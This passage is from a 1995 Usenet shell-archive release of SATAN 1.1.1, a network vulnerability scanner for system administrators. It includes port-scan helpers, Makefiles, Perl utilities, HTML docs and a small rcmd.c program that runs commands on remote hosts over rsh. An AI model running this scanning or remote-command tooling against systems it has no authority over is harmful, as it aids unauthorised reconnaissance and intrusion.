X error("unexpected address family: %d", hp->h_addrtype);
X memcpy((char *) &addr, hp->h_addr, hp->h_length);
X }
X return (addr);
X}
X
X/* find_port - translate numerical or symbolic service name */
X
Xint find_port(service, protocol)
Xchar *service;
Xchar *protocol;
X{
X struct servent *sp;
X int port;
X
X if ((port = atoi(service)) != 0) {
X return (htons(port));
X } else {
X if ((sp = getservbyname(service, protocol)) == 0)
X error("%s/%s: unknown service", service, protocol);
X return (sp->s_port);
X }
X}
X
END_OF_FILE
if test 1141 -ne `wc -c <'satan-1.1.1/src/port_scan/find_addr.c'`; then
echo shar: \"'satan-1.1.1/src/port_scan/find_addr.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/port_scan/find_addr.c'
fi
if test -f 'satan-1.1.1/src/port_scan/lib.h' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/port_scan/lib.h'\"
else
echo shar: Extracting \"'satan-1.1.1/src/port_scan/lib.h'\" $831 characters$
sed "s/^X//" >'satan-1.1.1/src/port_scan/lib.h' <<'END_OF_FILE'
X#ifdef __STDC__
X#define ARGS(x) x
X#else
X#define ARGS(x) ()
X#endif
X
X/* mallocs.c */
Xextern char *mymalloc();
Xextern char *myrealloc();
Xextern char *dupstr();
X
X/* find_addr.c */
Xextern struct in_addr find_addr();
Xextern int find_port();
X
X/* error.c */
Xextern void remark ARGS((char *,...));
Xextern void error ARGS((char *,...));
Xextern void panic ARGS((char *,...));
Xextern char *progname;
X
X/* print_data.c */
Xextern void print_data();
X
X/* ring.c */
Xtypedef struct RING {
X struct RING *succ; /* successor */
X struct RING *pred; /* predecessor */
X} RING;
Xextern void ring_init ARGS((RING *));
Xextern void ring_prepend ARGS((RING *, RING *));
Xextern void ring_append ARGS((RING *, RING *));
Xextern void ring_detach ARGS((RING *));
X#define ring_succ(c) ((c)->succ)
X#define ring_pred(c) ((c)->pred)
END_OF_FILE
if test 831 -ne `wc -c <'satan-1.1.1/src/port_scan/lib.h'`; then
echo shar: \"'satan-1.1.1/src/port_scan/lib.h'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/port_scan/lib.h'
fi
if test -f 'satan-1.1.1/src/port_scan/ring.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/port_scan/ring.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/port_scan/ring.c'\" $981 characters$
sed "s/^X//" >'satan-1.1.1/src/port_scan/ring.c' <<'END_OF_FILE'
X /*
X * ring_init(), ring_append(), ring_prepend(), ring_detach(), ring_succ(),
X * ring_pred() - circular list management utilities.

X *
X * Author: Wietse Venema.
X */
X

X#include "lib.h"
X
X/* ring_init - initialize ring head */
X
Xvoid ring_init(ring)
XRING *ring;
X{
X ring->pred = ring->succ = ring;
X}
X
X/* ring_append - insert entry after ring head */
X
Xvoid ring_append(ring, entry)
XRING *ring;
XRING *entry;
X{
X entry->succ = ring->succ;
X entry->pred = ring;
X ring->succ->pred = entry;
X ring->succ = entry;
X}
X
X/* ring_prepend - insert new entry before ring head */
X
Xvoid ring_prepend(ring, entry)
XRING *ring;
XRING *entry;
X{
X entry->pred = ring->pred;
X entry->succ = ring;
X ring->pred->succ = entry;
X ring->pred = entry;
X}
X
X/* ring_detach - remove entry from ring */
X
Xvoid ring_detach(entry)
XRING *entry;
X{
X register RING *succ = entry->succ;
X register RING *pred = entry->pred;
X
X pred->succ = succ;
X succ->pred = pred;
X}
END_OF_FILE
if test 981 -ne `wc -c <'satan-1.1.1/src/port_scan/ring.c'`; then
echo shar: \"'satan-1.1.1/src/port_scan/ring.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/port_scan/ring.c'
fi
if test -f 'satan-1.1.1/src/rpcgen/Makefile' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/rpcgen/Makefile'\"
else
echo shar: Extracting \"'satan-1.1.1/src/rpcgen/Makefile'\" $1189 characters$
sed "s/^X//" >'satan-1.1.1/src/rpcgen/Makefile' <<'END_OF_FILE'
X#
X# @(#)Makefile 2.1 88/08/01 4.0 RPCSRC
X#
X# Makefile for rpc protocol compiler
X# Copyright (C) 1987, Sun Microsystems, Inc.
X#
XSRCS= rpc_main.c rpc_hout.c rpc_cout.c rpc_parse.c rpc_scan.c rpc_util.c \
X rpc_svcout.c rpc_clntout.c
XHDRS= rpc_util.h rpc_parse.h rpc_scan.h
XOBJS= rpc_main.o rpc_hout.o rpc_cout.o rpc_parse.o rpc_scan.o rpc_util.o \
X rpc_svcout.o rpc_clntout.o
X
XGOAL=../../bin/rpcgen
XCFLAGS = -O $(XFLAGS)
X
X$(GOAL): $(OBJS)
X $(CC) $(CFLAGS) $(OBJS) -o $@
X
Xlint: $(SRCS) $(HDRS)
X lint $(SRCS)
X
Xclean:
X rm -f $(GOAL) $(OBJS)
X
Xrpc_clntout.o: rpc_clntout.c
Xrpc_clntout.o: rpc_parse.h
Xrpc_clntout.o: rpc_util.h
Xrpc_cout.o: rpc_cout.c
Xrpc_cout.o: rpc_parse.h
Xrpc_cout.o: rpc_util.h
Xrpc_hout.o: rpc_hout.c
Xrpc_hout.o: rpc_parse.h
Xrpc_hout.o: rpc_util.h
Xrpc_main.o: rpc_main.c
Xrpc_main.o: rpc_parse.h
Xrpc_main.o: rpc_scan.h
Xrpc_main.o: rpc_util.h
Xrpc_parse.o: rpc_parse.c
Xrpc_parse.o: rpc_parse.h
Xrpc_parse.o: rpc_scan.h
Xrpc_parse.o: rpc_util.h
Xrpc_scan.o: rpc_scan.c
Xrpc_scan.o: rpc_scan.h
Xrpc_scan.o: rpc_util.h
Xrpc_svcout.o: rpc_parse.h
Xrpc_svcout.o: rpc_svcout.c
Xrpc_svcout.o: rpc_util.h
Xrpc_util.o: rpc_parse.h
Xrpc_util.o: rpc_scan.h
Xrpc_util.o: rpc_util.c
Xrpc_util.o: rpc_util.h
END_OF_FILE
if test 1189 -ne `wc -c <'satan-1.1.1/src/rpcgen/Makefile'`; then
echo shar: \"'satan-1.1.1/src/rpcgen/Makefile'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/rpcgen/Makefile'
fi
echo shar: End of archive 14 $of 15$.
cp /dev/null ark14isdone

Wietse Venema

unread,

Apr 13, 1995, 3:00:00 AM4/13/95

Submitted-by: wswi...@wsbs06.win.tue.nl (Wietse Venema)
Posting-number: Volume 47, Issue 139
Archive-name: satan/part15

Environment: UNIX && HTML && Perl 5.0

#! /bin/sh

# This is a shell archive. Remove anything before this line, then feed it
# into a shell via "sh file" or similar. To overwrite existing files,
# type "sh file -c".

# Contents: satan-1.1.1/TODO satan-1.1.1/config/paths.pl
# satan-1.1.1/config/paths.sh satan-1.1.1/html/docs/artwork.html
# satan-1.1.1/html/docs/who_should_use.html
# satan-1.1.1/html/name.html
# satan-1.1.1/html/reporting/satan_info_name.pl
# satan-1.1.1/perl/hostname.pl satan-1.1.1/perl/shell.pl
# satan-1.1.1/perl/socket.pl satan-1.1.1/perl/status.pl
# satan-1.1.1/perl/suser.pl satan-1.1.1/rules/drop
# satan-1.1.1/src/boot/Makefile satan-1.1.1/src/misc/Makefile
# satan-1.1.1/src/misc/rcmd.c satan-1.1.1/src/misc/sys_socket.c
# satan-1.1.1/src/nfs-chk/Makefile
# satan-1.1.1/src/port_scan/mallocs.c
# satan-1.1.1/src/port_scan/non_blocking.c
# satan-1.1.1/src/port_scan/open_limit.c
# satan-1.1.1/src/port_scan/print_data.c
# satan-1.1.1/src/port_scan/strerror.c
# satan-1.1.1/src/yp-chk/Makefile
# Wrapped by kent@ftp on Wed Apr 12 20:30:11 1995

PATH=/bin:/usr/bin:/usr/ucb:/usr/local/bin:/usr/lbin:$PATH ; export PATH
echo If this archive is complete, you will see the following message:

echo ' "shar: End of archive 15 (of 15)."'
if test -f 'satan-1.1.1/TODO' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/TODO'\"
else
echo shar: Extracting \"'satan-1.1.1/TODO'\" $789 characters$
sed "s/^X//" >'satan-1.1.1/TODO' <<'END_OF_FILE'
XTODO list for future (SATAN version 1.1, 2.0, whatever)
X----------------------------------------------------------
X
Xo Enable SATAN to fork and run several scans in parallel
Xo Talk about sending mail/syslog to each host scanned
Xo Look at and deal with subnet masks properly...
Xo Put in a DNS walker
Xo fix rex client strategy (rex client is currently not being used)
Xo get a more complete list of banners from vendors and Internet
X on what is vulnerable and not, for the rules/* files.
Xo many more bug tests, etc.
Xo Add AFS testing support; currently there is none
Xo Add SNMP testing/probing
X
XAnd most importantly:
X
Xo MAPS! Big graphical maps that can *show* the relationships
X and are clickable to let users zoom into things, etc...
END_OF_FILE
if test 789 -ne `wc -c <'satan-1.1.1/TODO'`; then
echo shar: \"'satan-1.1.1/TODO'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/TODO'
fi
if test -f 'satan-1.1.1/config/paths.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/config/paths.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/config/paths.pl'\" $610 characters$
sed "s/^X//" >'satan-1.1.1/config/paths.pl' <<'END_OF_FILE'
X$FINGER="/usr/ucb/finger";
X$FTP="/usr/ucb/ftp";
X$RPCINFO="/usr/etc/rpcinfo";
X$RUSERS="/usr/ucb/rusers";
X$SHOWMOUNT="/usr/etc/showmount";
X$YPWHICH="/bin/ypwhich";
X$NSLOOKUP="/usr/etc/nslookup";
X$XHOST="/usr/bin/X11/xhost";
X$PING="/usr/etc/ping";
X$MOSAIC="/usr/exp/bin/netscape";
X
X$TCP_SCAN="bin/tcp_scan";
X$UDP_SCAN="bin/udp_scan";
X$FPING="bin/fping";
X$NFS_CHK="bin/nfs-chk";
X$YP_CHK="bin/yp-chk";
X$SAFE_FINGER="bin/safe_finger";
X$MD5="bin/md5";
X$SYS_SOCKET="bin/sys_socket";
X$BOOT="bin/boot";
X$GET_TARGETS="bin/get_targets";
X$TIMEOUT="bin/timeout";
X
X$SATAN_CF="config/satan.cf";
X$SERVICES="config/services";
X
X
END_OF_FILE
if test 610 -ne `wc -c <'satan-1.1.1/config/paths.pl'`; then
echo shar: \"'satan-1.1.1/config/paths.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/config/paths.pl'
fi
if test -f 'satan-1.1.1/config/paths.sh' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/config/paths.sh'\"
else
echo shar: Extracting \"'satan-1.1.1/config/paths.sh'\" $216 characters$
sed "s/^X//" >'satan-1.1.1/config/paths.sh' <<'END_OF_FILE'
XBASENAME=/bin/basename
XCAT=/bin/cat
XECHO=/bin/echo
XFILE=/bin/file
XRM=/bin/rm
XRSH=/usr/ucb/rsh
XSED=/bin/sed
XSU=/bin/su
XTEST=/bin/test
XTFTP=/usr/ucb/tftp
XWHOAMI=/usr/ucb/whoami
XGREP=/bin/grep
XREX=bin/rex
XRCMD=bin/rcmd
END_OF_FILE
if test 216 -ne `wc -c <'satan-1.1.1/config/paths.sh'`; then
echo shar: \"'satan-1.1.1/config/paths.sh'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/config/paths.sh'
fi
if test -f 'satan-1.1.1/html/docs/artwork.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/artwork.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/artwork.html'\" $577 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/artwork.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>SATAN Artwork</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>

X<H2><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">SATAN Artwork</H2>
X<HR>
XNeil Gaiman (author of the extraordinary comic book
X<CITE><STRONG>Sandman</STRONG></CITE>)
Xwas ever so kind enough to donate a custom image for the
XSATAN project. We're <STRONG>very</STRONG> grateful to him for putting
Xthe perfect, final touch on our system.
X<HR>
X<a href="../images/satan-full.gif">
X<IMG SRC="../images/satan-almost-full.gif" ALT="[SECOND SATAN IMAGE]"> </a>

X</BODY>
X</HTML>
END_OF_FILE

if test 577 -ne `wc -c <'satan-1.1.1/html/docs/artwork.html'`; then
echo shar: \"'satan-1.1.1/html/docs/artwork.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/artwork.html'
fi
if test -f 'satan-1.1.1/html/docs/who_should_use.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/who_should_use.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/who_should_use.html'\" $417 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/who_should_use.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>Who should use SATAN?</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>

X<H2>Who should use SATAN?</H2>
X<HR>
X<p>
XSATAN's primary design goal was to be an information gathering and
Xsorting tool. System administrators will probably get the most out
Xof using it, but it might prove useful for anyone who wants to learn
Xand understand more about network security.

X</BODY>
X</HTML>
END_OF_FILE

if test 417 -ne `wc -c <'satan-1.1.1/html/docs/who_should_use.html'`; then
echo shar: \"'satan-1.1.1/html/docs/who_should_use.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/who_should_use.html'
fi
if test -f 'satan-1.1.1/html/name.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/name.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/name.html'\" $457 characters$
sed "s/^X//" >'satan-1.1.1/html/name.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>SATAN Name</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>
X

X<H1><IMG SRC=images/satan.gif> SATAN</H1>
X<H2>(Security Administrator Tool for Analyzing Networks)</H2>
X<HR>
XThe name suits the program, in our opinion. If you don't like it,
Xfeel free to call it "SANTA", which is, perhaps, a more user-friendly
Xanagram of the acronym - you can run the <I>repent</I> program if you are
Xreally offended.
X

X</BODY>
X</HTML>
END_OF_FILE

if test 457 -ne `wc -c <'satan-1.1.1/html/name.html'`; then
echo shar: \"'satan-1.1.1/html/name.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/name.html'
fi
if test -f 'satan-1.1.1/html/reporting/satan_info_name.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_info_name.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_info_name.pl'\" $658 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_info_name.pl' <<'END_OF_FILE'
X#
X# Report host by name
X#
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title> Hosts - By Name </title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Hosts - By Name </H1>
X<hr>
X
X<FORM METHOD=POST ACTION="satan_info_host_action.pl">
X
X<strong>Enter a host name (<I>host.domain</I> preferred):</strong>

X<h3>
X<INPUT TYPE="reset" VALUE=" Reset ">

X<INPUT SIZE="30" NAME="_query_host" Value="$_query_host">
X<INPUT TYPE="submit" VALUE=" Display host ">

X</h3>
X
X</FORM>
X

X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |
X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 658 -ne `wc -c <'satan-1.1.1/html/reporting/satan_info_name.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_info_name.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_info_name.pl'
fi
if test -f 'satan-1.1.1/perl/hostname.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/hostname.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/hostname.pl'\" $538 characters$
sed "s/^X//" >'satan-1.1.1/perl/hostname.pl' <<'END_OF_FILE'
X#
X# file: hostname.pl
X# usage: $hostname = &'hostname;
X#
X# purpose: get hostname -- try method until we get an answer
X# or return "Amnesiac!"
X#
X
Xpackage hostname;
X
Xsub main'hostname {
X if (!defined $hostname) {
X $hostname = ( -x '/bin/hostname' && `/bin/hostname` )
X || ( -x '/usr/ucb/hostname' && `/usr/ucb/hostname` )
X || ( -x '/bin/uname' && `/bin/uname -n` )
X || ( -x '/usr/bin/uuname' && `/usr/bin/uuname -l`)
X || 'Amnesiac! '; # trailing space is for chop
X chop $hostname;
X }
X $hostname;
X}
X
X1;
END_OF_FILE
if test 538 -ne `wc -c <'satan-1.1.1/perl/hostname.pl'`; then
echo shar: \"'satan-1.1.1/perl/hostname.pl'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/perl/hostname.pl'
# end of 'satan-1.1.1/perl/hostname.pl'
fi
if test -f 'satan-1.1.1/perl/shell.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/shell.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/shell.pl'\" $716 characters$
sed "s/^X//" >'satan-1.1.1/perl/shell.pl' <<'END_OF_FILE'
X#
X# Run a command with extreme prejudice and make sure it finishes.
X#
X#
X# version 1, Mon Mar 20 14:09:35 1995, last mod by wietse
X#
X
Xrequire 'config/paths.pl';
Xrequire 'perl/status.pl';
X
Xsub bad_cmd {
X local($command) = @_;
X
X return ($command =~ /[^-_ ,a-zA-Z0-9:.!\/]/);
X}
X
Xsub open_cmd {
X local($handle, $timeout, $command) = @_;
X local($ret, $shell_cmd);
X
X $shell_cmd = "$TIMEOUT $timeout $command";
X
X if (&bad_cmd($shell_cmd)) {
X print "==> NOT RUNNING $shell_cmd (illegal characters)\n";
X } elsif ($debug) {
X $ret = open($handle, "$shell_cmd 2>/dev/null|");
X } else {
X $ret = open($handle, "$shell_cmd|");
X }
X &update_status("$shell_cmd");
X print "==> running $shell_cmd\n" if $debug;
X return $ret;
X}
X
X1;
X
END_OF_FILE
if test 716 -ne `wc -c <'satan-1.1.1/perl/shell.pl'`; then
echo shar: \"'satan-1.1.1/perl/shell.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/shell.pl'
fi
if test -f 'satan-1.1.1/perl/socket.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/socket.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/socket.pl'\" $570 characters$
sed "s/^X//" >'satan-1.1.1/perl/socket.pl' <<'END_OF_FILE'
X#
X# Some PERL installations have no sys/*.ph, and on some sites the
X# sys/*.ph files are busted. Since we need this only for a few things we
X# Even grabbing the definitions directly from sys/socket.h is problematic
X# on SYSV4 where the include files are messed up by recursive defines. So
X# we revert to running a C program that emits PERL code.
X#
X
Xrequire 'config/paths.pl';
X
Xdie "$SYS_SOCKET: $!. Did you run 'reconfig' and 'make'?\n"
X unless -x "$SYS_SOCKET";
X
Xeval `$SYS_SOCKET`;
X
X#
X# When that failed, die a horrible death.
X#
Xdie "./$SYS_SOCKET: $@.\n" if $@;
X
X1;
END_OF_FILE
if test 570 -ne `wc -c <'satan-1.1.1/perl/socket.pl'`; then
echo shar: \"'satan-1.1.1/perl/socket.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/socket.pl'
fi
if test -f 'satan-1.1.1/perl/status.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/status.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/status.pl'\" $598 characters$
sed "s/^X//" >'satan-1.1.1/perl/status.pl' <<'END_OF_FILE'
X#
X# Maintain time, date, satan status file and GUI feedback.
X#
X
Xrequire 'perllib/ctime.pl';
Xrequire $SATAN_CF;
X
X#
X# Convert to time of day.
X#
Xsub hhmmss {
X local($time) = @_;
X local($sec, $min, $hour);
X
X ($sec, $min, $hour) = localtime($time);
X return sprintf "%02d:%02d:%02d", "$hour", "$min", "$sec";
X}
X
Xsub update_status {
X local($text) = @_;
X
X $now = &hhmmss(time());
X
X # GUI feedback.
X print CLIENT "$now $text<br>\n" if $running_from_html;
X
X # Status file.
X die "Can't open status file $status_file\n"
X unless open(STATUS, ">>$status_file");
X print STATUS "$now $text\n";
X close STATUS;
X}
END_OF_FILE
if test 598 -ne `wc -c <'satan-1.1.1/perl/status.pl'`; then
echo shar: \"'satan-1.1.1/perl/status.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/status.pl'
fi
if test -f 'satan-1.1.1/perl/suser.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/suser.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/suser.pl'\" $701 characters$
sed "s/^X//" >'satan-1.1.1/perl/suser.pl' <<'END_OF_FILE'
X#
X# Find if these commands would all run with root privileges.
X#
X
Xsub suser {
X local(@path) = @_;
X local($dev, $ino, $mode, $nlink, $uid, $gid, $rdev, $size, $atime, $mtime, $ctime, $blksize, $blocks);
X
X while ($> != 0 && $#path >= $[) {
X if ((($dev, $ino, $mode, $nlink, $uid, $gid, $rdev, $size, $atime, $mtime, $ctime, $blksize, $blocks) = stat(@path[0])) == 0) {
X return(0);
X } elsif ($uid != 0 || ($mode & 04000) == 0) {
X return(0);
X }
X shift @path;
X }
X return(1);

X}
X
X#
X# Stand-alone mode

X#
Xif ($running_under_satan == 0) {
X

X warn 'suser.pl running in stand-alone mode';
X
X die "usage $0 file\n" unless $#ARGV == 0;
X
X print &suser($ARGV[0]) ? "Root privileged\n" : "Unprivileged\n";
X}
X
X1;
END_OF_FILE
if test 701 -ne `wc -c <'satan-1.1.1/perl/suser.pl'`; then
echo shar: \"'satan-1.1.1/perl/suser.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/suser.pl'
fi
if test -f 'satan-1.1.1/rules/drop' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/rules/drop'\"
else
echo shar: Extracting \"'satan-1.1.1/rules/drop'\" $417 characters$
sed "s/^X//" >'satan-1.1.1/rules/drop' <<'END_OF_FILE'
X#
X# Rules that determine what facts should be ignored. Each rule is applied once
X# for each 'a' SATAN fact. A rule is a PERL condition that has full access to
X# the $target..$text globals and to all functions.

X#
X# Empty lines and text after a "#" character are ignored. Long lines may
X# be broken with backslash-newline.
X#
X

X#
X# Don't complain about /cdrom being exported to the world.
X#
X$text =~ /exports \/cdrom/i
END_OF_FILE
if test 417 -ne `wc -c <'satan-1.1.1/rules/drop'`; then
echo shar: \"'satan-1.1.1/rules/drop'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/rules/drop'
fi
if test -f 'satan-1.1.1/src/boot/Makefile' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/boot/Makefile'\"
else
echo shar: Extracting \"'satan-1.1.1/src/boot/Makefile'\" $407 characters$
sed "s/^X//" >'satan-1.1.1/src/boot/Makefile' <<'END_OF_FILE'

XSHELL = /bin/sh
XBIN = ../../bin

XOBJECTS = boot.o bootparam_prot_xdr.o
XCFLAGS = -I. -O $(XFLAGS)
XXFLAGS = -DAUTH_GID_T=int
XRPCGEN = rpcgen

X#LIBS = -lsocket -lnsl
X

X$(BIN)/boot: $(OBJECTS)
X $(CC) $(CFLAGS) -o $@ $(OBJECTS) $(LIBS)
X
Xbootparam_prot.h bootparam_prot_xdr.c: bootparam_prot.x
X $(RPCGEN) bootparam_prot.x 2>/dev/null
X
X$(OBJECTS): bootparam_prot.h
X
Xclean:
X rm -f *.o $(BIN)/boot bootparam_prot*.[hc]
END_OF_FILE
if test 407 -ne `wc -c <'satan-1.1.1/src/boot/Makefile'`; then
echo shar: \"'satan-1.1.1/src/boot/Makefile'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/boot/Makefile'
fi
if test -f 'satan-1.1.1/src/misc/Makefile' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/misc/Makefile'\"
else
echo shar: Extracting \"'satan-1.1.1/src/misc/Makefile'\" $749 characters$
sed "s/^X//" >'satan-1.1.1/src/misc/Makefile' <<'END_OF_FILE'

XSHELL = /bin/sh
XBIN = ../../bin

XPROGS = $(BIN)/md5 $(BIN)/sys_socket $(BIN)/timeout $(BIN)/rcmd \
X $(BIN)/safe_finger $(BIN)/rex
XCFLAGS = -O -I. $(XFLAGS)
XXFLAGS = -DAUTH_GID_T=int
XRPCGEN = rpcgen

X#LIBS = -lsocket -lnsl
X
Xall: $(PROGS)
X

X$(BIN)/timeout: timeout.c
X $(CC) $(CFLAGS) -o $@ $?
X
X$(BIN)/rex: rex.o rex_xdr.o
X $(CC) $(CFLAGS) -o $@ rex.o rex_xdr.o $(LIBS)
X
X$(BIN)/md5: md5.o md5c.o
X $(CC) $(CFLAGS) -o $@ md5.o md5c.o
X
X$(BIN)/rcmd: rcmd.c
X $(CC) $(CFLAGS) -o $@ $? $(LIBS)
X
X$(BIN)/sys_socket: sys_socket.c
X $(CC) $(CFLAGS) -o $@ $?
X
X$(BIN)/safe_finger: safe_finger.c
X $(CC) $(CFLAGS) -o $@ $?
X
Xrex.h rex_xdr.c: rex.x
X $(RPCGEN) rex.x 2>/dev/null
X
Xrex.o rex_xdr.o: rex.h
X
Xclean:
X rm -f $(PROGS) *.o core rex_svc.c rex_clnt.c rex.h rex_xdr.c
END_OF_FILE
if test 749 -ne `wc -c <'satan-1.1.1/src/misc/Makefile'`; then
echo shar: \"'satan-1.1.1/src/misc/Makefile'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/misc/Makefile'
fi
if test -f 'satan-1.1.1/src/misc/rcmd.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/misc/rcmd.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/misc/rcmd.c'\" $762 characters$
sed "s/^X//" >'satan-1.1.1/src/misc/rcmd.c' <<'END_OF_FILE'
X/* rcmd - remote command execution */
X
X#include <sys/types.h>
X#include <stdio.h>
X#include <netdb.h>

X
Xmain(argc, argv)
Xint argc;
Xchar **argv;
X{

X char buffer[BUFSIZ];
X struct servent *sp;
X int s;
X int n;
X
X if (argc != 4) {
X fprintf(stderr, "usage: %s host user 'command'\n", argv[0]);
X return (1);
X }
X if (geteuid()) {
X fprintf(stderr, "test needs root privileges\n");
X return (1);
X }
X sp = getservbyname("shell", "tcp");
X if (sp == 0) {
X fprintf(stderr, "unknown service: shell/tcp\n");
X return (1);
X }
X s = rcmd(argv + 1, sp->s_port, argv[2], argv[2], argv[3], NULL);
X if (s >= 0) {
X while ((n = read(s, buffer, sizeof(buffer))) > 0)
X write(1, buffer, n);

X return (0);
X } else {

X return (1);
X }
X}

END_OF_FILE
if test 762 -ne `wc -c <'satan-1.1.1/src/misc/rcmd.c'`; then
echo shar: \"'satan-1.1.1/src/misc/rcmd.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/misc/rcmd.c'
fi
if test -f 'satan-1.1.1/src/misc/sys_socket.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/misc/sys_socket.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/misc/sys_socket.c'\" $465 characters$
sed "s/^X//" >'satan-1.1.1/src/misc/sys_socket.c' <<'END_OF_FILE'
X /*
X * Many PERL installations have no sys/socket.ph file, and with many
X * installations, the sys/*.ph files are broken. This is a bizarre
X * workaround: a C program to bootstrap a PERL application.

X *
X * Author: Wietse Venema.
X */

X#include <sys/types.h>
X#include <sys/socket.h>
X
Xint main(argc, argv)

Xint argc;
Xchar **argv;
X{

X printf("sub AF_INET { %d; }\n", AF_INET);
X printf("sub SOCK_STREAM { %d; }\n", SOCK_STREAM);
X printf("1;\n");
X}
END_OF_FILE
if test 465 -ne `wc -c <'satan-1.1.1/src/misc/sys_socket.c'`; then
echo shar: \"'satan-1.1.1/src/misc/sys_socket.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/misc/sys_socket.c'
fi
if test -f 'satan-1.1.1/src/nfs-chk/Makefile' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/nfs-chk/Makefile'\"
else
echo shar: Extracting \"'satan-1.1.1/src/nfs-chk/Makefile'\" $712 characters$
sed "s/^X//" >'satan-1.1.1/src/nfs-chk/Makefile' <<'END_OF_FILE'

XSHELL = /bin/sh
XBIN = ../../bin

XOBJECTS = nfs-chk.o nfs_prot_clnt.o nfs_prot_xdr.o mount_clnt.o mount_xdr.o
XMAKES = nfs_prot.h nfs_prot_clnt.c nfs_prot_svc.c nfs_prot_xdr.c mount.h \
X mount_clnt.c mount_svc.c mount_xdr.c
XPROG = $(BIN)/nfs-chk
XCFLAGS = -O -I. $(XFLAGS)
XXFLAGS = -DAUTH_GID_T=int
XRPCGEN = rpcgen

X#LIBS = -lsocket -lnsl
X

X$(PROG):$(OBJECTS)
X $(CC) $(CFLAGS) -o $@ $(OBJECTS) $(LIBS)
X
Xnfs_prot.h nfs_prot_clnt.c nfs_prot_xdr.c: nfs_prot.x
X $(RPCGEN) $? 2>/dev/null
X
Xnfs_prot.x:
X cp /usr/include/rpcsvc/nfs_prot.x .
X
Xmount.h mount_clnt.c mount_xdr.c: mount.x
X $(RPCGEN) $? 2>/dev/null
X
Xmount.x:
X cp /usr/include/rpcsvc/mount.x .
X
Xclean:
